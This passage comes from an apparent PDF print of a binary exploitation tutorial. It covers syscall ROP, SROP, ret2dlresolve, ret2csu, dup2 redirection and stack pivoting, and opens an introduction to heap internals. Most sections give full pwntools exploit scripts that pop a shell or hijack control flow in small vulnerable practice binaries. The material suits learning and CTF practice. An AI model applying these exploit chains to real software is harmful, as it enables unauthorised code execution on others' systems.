gets run. As per the table, the other parameters can be stored in RDI, RSI, RDX, etc and
every parameter has a different meaning for the different syscalls.
Execve
A notable syscall is the execve syscall, which executes the program passed to it in RDI.
RSI and RDX hold arvp and envp respectively.
This means, if there is no system() function, we can use execve to call /bin/sh
instead - all we have to do is pass in a pointer to /bin/sh to RDI, and populate RSI and
RDX with 0 (this is because both argv and envp need to be NULL to pop a shell).
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 108/240
4/10/24, 12:28 PM Binary Exploitation
The Source
context.arch = 'amd64'
context.os = 'linux'
elf = ELF.from_assembly(
'''
mov rdi, 0;
mov rsi, rsp;
sub rsi, 8;
mov rdx, 300;
syscall;
ret;
pop rax;
ret;
pop rdi;
ret;
pop rsi;
ret;
pop rdx;
ret;
'''
)
elf.save('vuln')
The binary contains all the gadgets you need! First it executes a read syscall, writes to
the stack, then the ret occurs and you can gain control.
But what about the /bin/sh ? I slightly cheesed this one and couldn't be bothered to
add it to the assembly, so I just did:
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 109/240
4/10/24, 12:28 PM Binary Exploitation
Exploitation
RAX: 0x3b
RDI: pointer to /bin/sh
RSI: 0x0
RDX: 0x0
To get the address of the gadgets, I'll just do objdump -d vuln . The address of
/bin/sh can be gotten using strings:
The offset from the base to the string is 0x1250 ( -t x tells strings to print the
offset as hex). Armed with all this information, we can set up the constants:
POP_RAX = 0x10000018
POP_RDI = 0x1000001a
POP_RSI = 0x1000001c
POP_RDX = 0x1000001e
SYSCALL = 0x10000015
Now we just need to populate the registers. I'll tell you the padding is 8 to save time:
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 110/240
4/10/24, 12:28 PM Binary Exploitation
payload = flat(
'A' * 8,
POP_RAX,
0x3b,
POP_RDI,
binsh,
POP_RSI,
0x0,
POP_RDX,
0X0,
SYSCALL
)
p.sendline(payload)
p.interactive()
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 111/240
4/10/24, 12:28 PM Binary Exploitation
Sigreturn-Oriented
Programming (SROP)
Controlling all registers at once
Overview
A sigreturn is a special type of syscall. The purpose of sigreturn is to return from the
signal handler and to clean up the stack frame after a signal has been unblocked.
What this involves is storing all the register values on the stack. Once the signal is
unblocked, all the values are popped back in (RSP points to the bottom of the sigreturn
frame, this collection of register values).
Exploitation
By leveraging a sigreturn , we can control all register values at once - amazing! Yet
this is also a drawback - we can't pick-and-choose registers, so if we don't have a stack
leak it'll be hard to set registers like RSP to a workable value. Nevertheless, this is a
super powerful technique - especially with limited gadgets.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 112/240
4/10/24, 12:28 PM Binary Exploitation
Using SROP
Source
As with the syscalls, I made the binary using the pwntools ELF features:
context.arch = 'amd64'
context.os = 'linux'
elf = ELF.from_assembly(
'''
mov rdi, 0;
mov rsi, rsp;
sub rsi, 8;
mov rdx, 500;
syscall;
ret;
pop rax;
ret;
''', vma=0x41000
)
elf.save('vuln')
It's quite simple - a read syscall, followed by a pop rax; ret gadget. You can't
control RDI/RSI/RDX, which you need to pop a shell, so you'll have to use SROP.
Exploitation
First let's plonk down the available gadgets and their location, as well as the location of
/bin/sh .
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 113/240
4/10/24, 12:28 PM Binary Exploitation
From here, I suggest you try the payload yourself. The padding (as you can see in the
assembly) is 8 bytes until RIP, then you'll need to trigger a sigreturn , followed by
the values of the registers.
payload = b'A' * 8
payload += p64(POP_RAX)
payload += p64(0xf)
payload += p64(SYSCALL_RET)
Now the syscall looks at the location of RSP for the register values; we'll have to fake
them. They have to be in a specific order, but luckily for us pwntools has a cool feature
called a SigreturnFrame() that handles the order for us.
frame = SigreturnFrame()
Now we just need to decide what the register values should be. We want to trigger an
execve() syscall, so we'll set the registers to the values we need for that:
However, in order to trigger this we also have to control RIP and point it back at the
syscall gadget, so the execve actually executes:
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 114/240
4/10/24, 12:28 PM Binary Exploitation
frame.rip = SYSCALL_RET
payload += bytes(frame)
p.sendline(payload)
p.interactive()
Final Exploit
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 115/240
4/10/24, 12:28 PM Binary Exploitation
frame = SigreturnFrame()
frame.rax = 0x3b # syscall number for execve
frame.rdi = BINSH # pointer to /bin/sh
frame.rsi = 0x0 # NULL
frame.rdx = 0x0 # NULL
frame.rip = SYSCALL_RET
payload = b'A' * 8
payload += p64(POP_RAX)
payload += p64(0xf)
payload += p64(SYSCALL_RET)
payload += bytes(frame)
p.sendline(payload)
p.interactive()
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 116/240
4/10/24, 12:28 PM Binary Exploitation
ret2dlresolve
Resolving our own libc functions
Broad Overview
During a ret2dlresolve, the attacker tricks the binary into resolving a function of its
choice (such as system ) into the PLT. This then means the attacker can use the PLT
function as if it was originally part of the binary, bypassing ASLR (if present) and
requiring no libc leaks.
Detailed Overview
Dynamically-linked ELF objects import libc functions when they are first called using
the PLT and GOT. During the relocation of a runtime symbol, RIP will jump to the PLT
and attempt to resolve the symbol. During this process a "resolver" is called.
For all these screenshots, I broke at read@plt . I'm using GDB with the pwndbg plugin as
it shows it a bit better.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 117/240
4/10/24, 12:28 PM Binary Exploitation
The PLT jumps to wherever the GOT points. Originally, before the GOT is updated, it
points back to the instruction after the jmp in the PLT to resolve it.
In order to resolve the functions, there are 3 structures that need to exist within the
binary. Faking these 3 structures could enable us to trick the linker into resolving a
function of our choice, and we can also pass parameters in (such as /bin/sh ) once
resolved.
Structures
There are 3 structures we need to fake.
$readelf -d source
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 118/240
4/10/24, 12:28 PM Binary Exploitation
JMPREL
The JMPREL segment ( .rel.plt ) stores the Relocation Table, which maps each
entry to a symbol.
$readelf -r source
The column name coresponds to our symbol name. The offset is the GOT entry for
our symbol. info stores additional metadata.
STRTAB
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 119/240
4/10/24, 12:28 PM Binary Exploitation
SYMTAB
typedef struct
{
Elf32_Word st_name ; /* Symbol name (string tbl index) */
Elf32_Addr st_value ; /* Symbol value */
Elf32_Word st_size ; /* Symbol size */
unsigned char st_info ; /* Symbol type and binding */
unsigned char st_other ; /* Symbol visibility under glibc>=2.2 */
Elf32_Section st_shndx ; /* Section index */
} Elf32_Sym ;
The most important value here is st_name as this gives the offset in STRTAB of the
symbol name. The other fields are not relevant to the exploit itself.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 120/240
4/10/24, 12:28 PM Binary Exploitation
Here we're reading SYMTAB + R_SYM * size (16) , and it appears that the offset (the
SYMTAB st_name variable) is 0x10 .
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 121/240
4/10/24, 12:28 PM Binary Exploitation
Let's hop back to the GOT and PLT for a slightly more in-depth look.
If the GOT entry is unpopulated, we push the reloc_offset value and jump to the
beginning of the .plt section. A few instructions later, the dl-resolve() function is
called, with reloc_offset being one of the arguments. It then uses this
reloc_offset to calculate the relocation and symtab entries.
Resources
The Original Phrack Article
0ctf's babystack
rk700 (in Chinese)
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 122/240
4/10/24, 12:28 PM Binary Exploitation
Exploitation
Source
To display an example program, we will use the example given on the pwntools entry
for ret2dlresolve:
#include <unistd.h>
void vuln(void){
char buf[64];
read(STDIN_FILENO, buf, 200);
}
int main(int argc, char** argv){
vuln();
}
Exploitation
pwntools contains a fancy Ret2dlresolvePayload that can automate the majority of
our exploit:
rop.raw('A' * 76)
rop.read(0, dlresolve.data_addr) # read to where we want to w
rop.ret2dlresolve(dlresolve) # call .plt and dl-resolve()
p.sendline(rop.chain())
p.sendline(dlresolve.payload) # now the read is called and
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 123/240
4/10/24, 12:28 PM Binary Exploitation
Now we know where the fake structures are placed. Since I ran the script with the
DEBUG parameter, I'll check what gets sent.
00000000 73 79 73 74 65 6d 00 61 63 61 61 61 a4 4b 00 00 │syst│em·a
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 ce 04 08 │····│····
00000020 07 c0 04 00 2f 62 69 6e 2f 73 68 00 0a │····│/bin
0000002d
system is being written to 0x804ce00 - as the debug said the Symbol name addr
would be placed
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 124/240
4/10/24, 12:28 PM Binary Exploitation
After that, at 0x804ce0c , the Elf32_Sym struct starts. First it contains the table
index of that string, which in this case is 0x4ba4 as it is a very long way off the
actual table. Next it contains the other values on the struct, but they are irrelevant
and so zeroed out.
At 0x804ce1c that Elf32_Rel struct starts; first it contains the address of the
system string, 0x0804ce00 , then the r_info variable - if you remember this
specifies the R_SYM , which is used to link the SYMTAB and the STRTAB .
After all the structures we place the string /bin/sh at 0x804ce24 - which, if you
remember, was the argument passed to system when we printed the rop.dump() :
Final Exploit
rop.raw('A' * 76)
rop.read(0, dlresolve.data_addr) # read to where we want to write the fak
rop.ret2dlresolve(dlresolve) # call .plt and dl-resolve() with the co
log.info(rop.dump())
p.sendline(rop.chain())
p.sendline(dlresolve.payload) # now the read is called and we pass all
p.interactive()
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 125/240
4/10/24, 12:28 PM Binary Exploitation
ret2csu
Controlling registers when gadgets are lacking
ret2csu is a technique for populating registers when there is a lack of gadgets. More
information can be found in the original paper, but a summary is as follows:
When an application is dynamically compiled (compiled with libc linked to it), there is a
selection of functions it contains to allow the linking. These functions contain within
them a selection of gadgets that we can use to populate registers we lack gadgets for,
most importantly __libc_csu_init , which contains the following two gadgets:
The second might not look like a gadget, but if you look it calls r15 + rbx*8 . The first
gadget chain allows us to control both r15 and rbx in that series of huge pop
operations, meaning whe can control where the second gadget calls afterwards.
Note it's call qword [r15 + rbx*8] , not call qword r15 + rbx*8 . This means it'll
calculate r15 + rbx*8 then go to that memory address, read it, and call that value.
This mean we have to find a memory address that contains where we want to jump.
These gadget chains allow us, despite an apparent lack of gadgets, to populate the RDX
and RSI registers (which are important for parameters) via the second gadget, then
jump wherever we wish by simply controlling r15 and rbx to workable values.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 126/240
4/10/24, 12:28 PM Binary Exploitation
This means we can potentially pull off syscalls for execve , or populate parameters for
functions such as write() .
You may wonder why we would do something like this if we're linked to libc - why not just
read the GOT? Well, some functions - such as write() - require three parameters (and at
least 2), so we would require ret2csu to populate them if there was a lack of gadgets.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 127/240
4/10/24, 12:28 PM Binary Exploitation
Exploitation
Source
#include <stdio.h>
int main() {
puts("Come on then, ret2csu me");
char input[30];
gets(input);
return 0;
}
Obviously, you can do a ret2plt followed by a ret2libc, but that's really not the point of
this. Try calling win() , and to do that you have to populate the register rdx . Try what
we've talked about, and then have a look at the answer if you get stuck.
Analysis
We can work out the addresses of the massive chains using r2, and chuck this all into
pwntools.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 128/240
4/10/24, 12:28 PM Binary Exploitation
[...]
0x00401208 4c89f2 mov rdx, r14
0x0040120b 4c89ee mov rsi, r13
0x0040120e 4489e7 mov edi, r12d
0x00401211 41ff14df call qword [r15 + rbx*8]
0x00401215 4883c301 add rbx, 1
0x00401219 4839dd cmp rbp, rbx
0x0040121c 75ea jne 0x401208
0x0040121e 4883c408 add rsp, 8
0x00401222 5b pop rbx
0x00401223 5d pop rbp
0x00401224 415c pop r12
0x00401226 415d pop r13
0x00401228 415e pop r14
0x0040122a 415f pop r15
0x0040122c c3 ret
Note I'm not popping RBX, despite the call . This is because RBX ends up being 0
anyway, and you want to mess with the least number of registers you need to to ensure
the best success.
Exploitation
Finding a win()
Now we need to find a memory location that has the address of win() written into it
so that we can point r15 at it. I'm going to opt to call gets() again instead, and then
input the address. The location we input to is a fixed location of our choice, which is
reliable. Now we just need to find a location.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 129/240
4/10/24, 12:28 PM Binary Exploitation
To do this, I'll run r2 on the binary then dcu main to contiune until main. Now let's
check permissions:
[0x00401199]> dm
0x0000000000400000 - 0x0000000000401000 - usr 4K s r--
0x0000000000401000 - 0x0000000000402000 * usr 4K s r-x
0x0000000000402000 - 0x0000000000403000 - usr 4K s r--
0x0000000000403000 - 0x0000000000404000 - usr 4K s r--
0x0000000000404000 - 0x0000000000405000 - usr 4K s rw-
RW_LOC = 0x00404028
Reading in win()
rop.raw('A' * 40)
rop.gets(RW_LOC)
Now we have the address written there, let's just get the massive ropchain and plonk it
all in
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 130/240
4/10/24, 12:28 PM Binary Exploitation
rop.raw(POP_CHAIN)
rop.raw(0) # r12
rop.raw(0) # r13
rop.raw(0xdeadbeefcafed00d) # r14 - popped into RDX!
rop.raw(RW_LOC) # r15 - holds location of called function
rop.raw(REG_CALL) # all the movs, plus the call
Sending it off
p.sendlineafter('me\n', rop.chain())
p.sendline(p64(elf.sym['win'])) # send to gets() so it's writt
print(p.recvline()) # should receive "Awesome work
Final Exploit
from pwn import *
rop.raw('A' * 40)
rop.gets(RW_LOC)
rop.raw(POP_CHAIN)
rop.raw(0) # r12
rop.raw(0) # r13
rop.raw(0xdeadbeefcafed00d) # r14 - popped into RDX!
rop.raw(RW_LOC) # r15 - holds location of called function
rop.raw(REG_CALL) # all the movs, plus the call
p.sendlineafter('me\n', rop.chain())
p.sendline(p64(elf.sym['win'])) # send to gets() so it's writt
print(p.recvline()) # should receive "Awesome work
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 131/240
4/10/24, 12:28 PM Binary Exploitation
Simplification
As you probably noticed, we don't need to pop off r12 or r13, so we can move
POP_CHAIN a couple of intructions along:
rop = ROP(elf)
rop.raw('A' * 40)
rop.gets(RW_LOC)
rop.raw(POP_CHAIN)
rop.raw(0xdeadbeefcafed00d) # r14 - popped into RDX!
rop.raw(RW_LOC) # r15 - holds location of called function
rop.raw(REG_CALL) # all the movs, plus the call
p.sendlineafter('me\n', rop.chain())
p.sendline(p64(elf.sym['win']))
print(p.recvline())
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 132/240
4/10/24, 12:28 PM Binary Exploitation
Overview
File Descriptors are integers that represent conections to sockets or files or whatever
you're connecting to. In Unix systems, there are 3 main file descriptors (often
abbreviated fd) for each application:
Name fd
stdin 0
stdout 1
stderr 2
These are, as shown above, standard input, output and error. You've probably used
them before yourself, for example to hide errors when running commands:
p = process()
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 133/240
4/10/24, 12:28 PM Binary Exploitation
p = remote(host, port)
The reason for this is every new connection has a different fd. If you listen in C, since fd
0-2 is reserved, the listening socket will often be assigned fd 3 . Once we connect, we
set up another fd, fd 4 (neither the 3 nor the 4 is certain, but statistically likely).
Here we have to tell the program to duplicate the file descriptor in order to redirect
stdin and stderr to fd 4 , and glibc provides a simple way to do so.
The dup syscall (and C function) duplicates the fd and uses the lowest-numbered free
fd. However, we need to ensure it's fd 4 that's used, so we can use dup2() . dup2
takes in two parameters: a newfd and an oldfd . Descriptor oldfd is duplicated to
newfd , allowing us to interact with stdin and stdout and actually use any shell we
may have popped.
Note that the man page outlines how if newfd is in use it is silently closed, which is
exactly what we wish.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 134/240
4/10/24, 12:28 PM Binary Exploitation
Exploit
Duplicating the Descriptors
Source
I'll include source.c , but most of it is socket programming derived from here. The two
relevent functions - vuln() and win() - I'll list below.
void win() {
system("/bin/sh");
}
Exploitation
Start the binary with ./vuln 9001 .
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 135/240
4/10/24, 12:28 PM Binary Exploitation
Testing Offset
payload = b'AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUA
pause()
p.sendline(payload)
Once the pause() is reached, I hook on with radare2 and set a breakpoint at the ret .
$ r2 -d -A $(pidof vuln)
[0x7f741033bdee]> db 0x0040126b
[0x7f741033bdee]> dc
hit breakpoint at: 40126b
Generate Exploit
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 136/240
4/10/24, 12:28 PM Binary Exploitation
payload = flat(
'A' * 40,
elf.sym['win']
)
p.sendline(payload)
p.interactive()
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 137/240
4/10/24, 12:28 PM Binary Exploitation
A shell was popped there! This is the file descriptor issue we talked about before.
I've simplified this challenge a lot by including a call to dup2() within the vulnerable
binary, but normally you would leak libc via the GOT and then use libc's dup2() rather
than the PLT; this walkthrough is about the basics, so I kept it as simple as possible.
Using dup2()
Since we need two parameters, we'll need to find a gadget for RDI and RSI. I'll use
ROPgadget to find these.
POP_RDI = 0x40150b
POP_RSI_R15 = 0x401509
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 138/240
4/10/24, 12:28 PM Binary Exploitation
payload = flat(
'A' * 40,
POP_RDI,
4, # newfd
POP_RSI_R15,
0, # oldfd -> stdin
0, # junk r15
elf.plt['dup2'],
POP_RDI,
4, # newfd
POP_RSI_R15,
1, # oldfd -> stdout
0, # junk r15
elf.plt['dup2'],
elf.sym['win']
)
p.sendline(payload)
p.recvuntil('Thanks!\x00')
p.interactive()
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 139/240
4/10/24, 12:28 PM Binary Exploitation
Final Exploit
from pwn import *
POP_RDI = 0x40150b
POP_RSI_R15 = 0x401509
payload = flat(
'A' * 40,
POP_RDI,
4, # newfd
POP_RSI_R15,
0, # oldfd -> stdin
0, # junk r15
elf.plt['dup2'],
POP_RDI,
4, # newfd
POP_RSI_R15,
1, # oldfd -> stdout
0, # junk r15
elf.plt['dup2'],
elf.sym['win']
)
p.sendline(payload)
p.recvuntil('Thanks!\x00')
p.interactive()
Pwntools' ROP
These kinds of chains are where pwntools' ROP capabilities really come into their own:
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 140/240
4/10/24, 12:28 PM Binary Exploitation
rop = ROP(elf)
rop.raw('A' * 40)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.win()
p.sendline(rop.chain())
p.recvuntil('Thanks!\x00')
p.interactive()
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 141/240
4/10/24, 12:28 PM Binary Exploitation
Socat
More on socat
Most of the command is fairly logical (and the rest you can look up). The important part
is that in this scenario we don't have to redirect file descriptors, as socat does it all
for us.
What is important, however, is pty mode. Because pty mode allows you to
communicate with the process as if you were a user, it takes in input literally - including
DELETE characters. If you send a \x7f - a DELETE - it will literally delete the
previous character (as shown shortly in my Dream Diary: Chapter 1 writeup). This is
incredibly relevant because in 64-bit the \x7f is almost always present in glibc
addresses, so it's not quite so possible to avoid (although you could keep rerunning the
exploit until the rare occasion you get an 0x7e... libc base).
To bypass this we use the socat pty escape character \x16 and prepend it to any
\x7f we send across.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 142/240
4/10/24, 12:28 PM Binary Exploitation
Forking Processes
Flaws with fork()
Some processes use fork() to deal with multiple requests at once, most notably
servers.
This allows us to bruteforce the RIP one byte at a time, essentially leaking PIE - and the
same thing for canaries and RBP. 24 bytes of multithreaded bruteforce, and once you
leak all of those you can bypass a canary, get a stack leak from RBP and PIE base from
RIP.
I won't be making a binary for this (yet), but you can check out ippsec's Rope writeup
for HTB - Rope root was this exact technique.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 143/240
4/10/24, 12:28 PM Binary Exploitation
Stack Pivoting
Lack of space for ROP
Overview
Stack Pivoting is a technique we use when we lack space on the stack - for example, we
have 16 bytes past RIP. In this scenario, we're not able to complete a full ROP chain.
During Stack Pivoting, we take control of the RSP register and "fake" the location of
the stack. There are a few ways to do this.
Possibly the simplest, but also the least likely to exist. If there is one of these, you're
quite lucky.
If you can find a pop <reg> gadget, you can then use this xchg gadget to swap the
values with the ones in RSP. Requires about 16 bytes of stack space after the saved
return pointer:
leave; ret
This is a very interesting way of stack pivoting, and it only requires 8 bytes.
Every function (except main ) is ended with a leave; ret gadget. leave is
equivalent to
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 144/240
4/10/24, 12:28 PM Binary Exploitation
That means that when we overwrite RIP the 8 bytes before that overwrite RBP (you
may have noticed this before). So, cool - we can overwrite rbp using leave . How
does that help us?
Well if we look at leave again, we noticed the value in RBP gets moved to RSP! So if
we call overwrite RBP then overwrite RIP with the address of leave; ret again, the
value in RBP gets moved to RSP. And, even better, we don't need any more stack space
than just overwriting RIP, making it very compressed.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 145/240
4/10/24, 12:28 PM Binary Exploitation
Exploitation
Stack Pivoting
Source
void vuln() {
char buffer[0x60];
printf("Try pivoting to: %p\n", buffer);
fgets(buffer, 0x80, stdin);
}
int main() {
vuln();
return 0;
}
It's fairly clear what the aim is - call winner() with the two correct parameters. The
fgets() means there's a limited number of bytes we can overflow, and it's not
enough for a regular ROP chain. There's also a leak to the start of the buffer, so we
know where to set RSP to.
We'll try two ways - using pop rsp , and using leave; ret . There's no xchg gadget,
but it's virtually identical to just popping RSP anyway.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 146/240
4/10/24, 12:28 PM Binary Exploitation
Since I assume you know how to calculate padding, I'll tell you there's 96 until we
overwrite stored RBP and 104 (as expected) until stored RIP.
Basic Setup
Just to get the basics out of the way, as this is common to both approaches:
p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 147/240
4/10/24, 12:28 PM Binary Exploitation
pop rsp
Using a pop rsp gadget to stack pivot
Exploitation
Gadgets
FIrst off, let's grab all the gadgets. I'll use ROPgadget again to do so:
Now we have all the gadgets, let's chuck them into the script:
Let's just make sure the pop works by sending a basic chain and then breaking on ret
and stepping through.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 148/240
4/10/24, 12:28 PM Binary Exploitation
payload = flat(
'A' * 104,
POP_CHAIN,
buffer,
0, # r13
0, # r14
0 # r15
)
pause()
p.sendline(payload)
print(p.recvline())
If you're careful, you may notice the mistake here, but I'll point it out in a sec. Send it
off, attach r2.
[0x7f96f01e9dee]> db 0x004011b8
[0x7f96f01e9dee]> dc
hit breakpoint at: 4011b8
[0x004011b8]> pxq @ rsp
0x7ffce2d4fc68 0x0000000000401225 0x00007ffce2d4fc00
0x7ffce2d4fc78 0x0000000000000000 0x00007ffce2d4fd68
You may see that only the gadget + 2 more values were written; this is because our
buffer length is limited, and this is the reason we need to stack pivot. Let's step
through the first pop .
[0x004011b8]> ds
[0x00401225]> ds
[0x00401226]> dr rsp
0x7ffce2d4fc00
You may notice it's the same as our "leaked" value, so it's working. Now let's try and
pop the 0x0 into r13 .
[0x00401226]> ds
[0x00401228]> dr r13
0x4141414141414141
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 149/240
4/10/24, 12:28 PM Binary Exploitation
Remember, however, that pop r13 is equivalent to mov r13, [rsp] - the value from
the top of the stack is moved into r13 . Because we moved RSP, the top of the stack
moved to our buffer and AAAAAAAA was popped into it - because that's what the top
of the stack points to now.
Full Payload
Now we understand the intricasies of the pop, let's just finish the exploit off. To
account for the additional pop calls, we have to put some junk at the beginning of the
buffer, before we put in the ropchain.
payload = flat(
0, # r13
0, # r14
0, # r15
POP_RDI,
0xdeadbeef,
POP_RSI_R15,
0xdeadc0de,
0x0, # r15
elf.sym['winner']
)
payload += flat(
POP_CHAIN,
buffer # rsp - now stack points to our buffer!
)
Final Exploit
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 150/240
4/10/24, 12:28 PM Binary Exploitation
p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')
payload = flat(
0, # r13
0, # r14
0, # r15
POP_RDI,
0xdeadbeef,
POP_RSI_R15,
0xdeadc0de,
0x0, # r15
elf.sym['winner']
)
payload += flat(
POP_CHAIN,
buffer # rsp
)
pause()
p.sendline(payload)
print(p.recvline())
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 151/240
4/10/24, 12:28 PM Binary Exploitation
leave
Using leave; ret to stack pivot
Exploitation
By calling leave; ret twice, as described, this happens:
Gadgets
LEAVE_RET = 0x40117c
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229
I won't bother stepping through it again - if you want that, check out the pop rsp
walkthrough.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 152/240
4/10/24, 12:28 PM Binary Exploitation
payload = flat(
'A' * 96,
buffer,
LEAVE_RET
)
pause()
p.sendline(payload)
print(p.recvline())
Full Payload
You might be tempted to just chuck the payload into the buffer and boom, RSP points
there, but you can't quite - as with the previous approach, there is a pop instruction
that needs to be accounted for - again, remember leave is
So once you overwrite RSP, you still need to give a value for the pop rbp .
payload = flat(
0x0, # account for final "pop rbp"
POP_RDI,
0xdeadbeef,
POP_RSI_R15,
0xdeadc0de,
0x0, # r15
elf.sym['winner']
)
payload += flat(
buffer,
LEAVE_RET
)
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 153/240
4/10/24, 12:28 PM Binary Exploitation
Final Exploit
from pwn import *
p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')
LEAVE_RET = 0x40117c
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229
payload = flat(
0x0, # rbp
POP_RDI,
0xdeadbeef,
POP_RSI_R15,
0xdeadc0de,
0x0,
elf.sym['winner']
)
payload += flat(
buffer,
LEAVE_RET
)
pause()
p.sendline(payload)
print(p.recvline())
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 154/240
4/10/24, 12:28 PM Binary Exploitation
Heap
Still learning :)
Moving onto heap exploitation does not require you to be a god at stack
exploitation, but it will require a better understanding of C and how concepts such as
pointers work. From time to time we will be discussing the glibc source code itself, and
while this can be really overwhelming, it's incredibly good practise.
I'll do everything I can do make it as simple as possible. Most references (to start with)
will be hyperlinks, so feel free to just keep the concept in mind for now, but as you
progress understanding the source will become more and more important.
Occasionally different snippets of code will be from different glibc versions, and I'll do my
best to note down which version they are from. The reason for this is that newer versions
have a lot of protections that will obscure the basic logic of the operation, so we will start
with older implementations and build up.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 155/240
4/10/24, 12:28 PM Binary Exploitation
In C, this often means using functions such as malloc() to request the space.
However, the heap is very slow and can take up tons of space. This means that the
developer has to tell libc when the heap data is "finished with", and it does this via calls
to free() which mark the area as available. But where there are humans there will be
implementation flaws, and no amount of protection will ever ensure code is completely
safe.
In the following sections, we will only discuss 64-bit systems (with the exception of
some parts that were written long ago). The theory is the same, but pretty much any
heap challenge (or real-world application) will be on 64-bit systems.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 156/240
4/10/24, 12:28 PM Binary Exploitation
Chunks
Internally, every chunk - whether allocated or free - is stored in a malloc_chunk
structure. The difference is how the memory space is used.
Allocated Chunks
When space is allocated from the heap using a function such as malloc() , a pointer to
a heap address is returned. Every chunk has additional metadata that it has to store in
both its used and free states.
The chunk has two sections - the metadata of the chunk (information about the chunk)
and the user data, where the data is actually stored.
The size field is the overall size of the chunk, including metadata. It must be a
multiple of 8 , meaning the last 3 bits of the size are 0 . This allows the flags A ,
M and P to take up that space, with M being the 3rd-last bit of size , A the
2nd-last and P the last.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 157/240
4/10/24, 12:28 PM Binary Exploitation
P is the PREV_INUSE flag, which is set when the previous adjacent chunk (the
chunk ahead) is in use
M is the IS_MMAPPED flag, which is set when the chunk is allocated via mmap()
rather than a heap mechanism such as malloc()
A is the NON_MAIN_ARENA flag, which is set when the chunk is not located in
main_arena ; we will get to Arenas in a later section, but in essence every created
thread is provided a different arena (up to a limit) and chunks in these arenas have
the A bit set
Free Chunks
Free chunks have additional metadata to handle the linking between them.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 158/240
4/10/24, 12:28 PM Binary Exploitation
struct malloc_chunk {
INTERNAL_SIZE_T mchunk_prev_size; /* Size of previous chunk (if f
INTERNAL_SIZE_T mchunk_size; /* Size in bytes, including ove
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 159/240
4/10/24, 12:28 PM Binary Exploitation
An Overview of Freeing
When we are done with a chunk's data, the data is freed using a function such as
free() . This tells glibc that we are done with this portion of memory.
In the interest of being as efficient as possible, glibc makes a lot of effort to recycle
previously-used chunks for future requests in the program. As an example, let's say we
need 100 bytes to store a string input by the user. Once we are finished with it, we tell
glibc we are no longer going to use it. Later in the program, we have to input another
100-byte string from the user. Why not reuse that same part of memory? There's no
reason not to, right?
It is the bins that are responsible for the bulk of this memory recycling. A bin is a
(doubly- or singly-linked) list of free chunks. For efficiency, different bins are used for
different sizes, and the operations will vary depending on the bins as well to keep high
performance.
When a chunk is freed, it is "moved" to the bin. This movement is not physical, but
rather a pointer - a reference to the chunk - is stored somewhere in the list.
Bin Operations
There are four bins: fastbins, the unsorted bin, smallbins and largebins.
When a chunk is freed, the function that does the bulk of the work in glibc is
_int_free() . I won't delve into the source code right now, but will provide hyperlinks
to glibc 2.3, a very old one without security checks. You should have a go at familiarising
yourself with what the code says, but bear in mind things have been moved about a bit
to get to there they are in the present day! You can change the version on the left in
bootlin to see how it's changed.
https://ir0nstone.gitbook.io/notes/~gitbook/pdf 160/240
4/10/24, 12:28 PM Binary Exploitation
First, the size of the chunk is checked. If it is less than the largest fastbin size, add
it to the correct fastbin
What is consolidation? We'll be looking into this more concretely later, but it's
essentially the process of finding other free chunks around the chunk being freed and
combining them into one large chunk. This makes the reuse process more efficient.
Fastbins
Fastbins store small-sized chunks. There are 10 of these for chunks of size 16, 24, 32, 40,
48, 56, 64, 72, 80 or 88 bytes including metadata.
Unsorted Bin
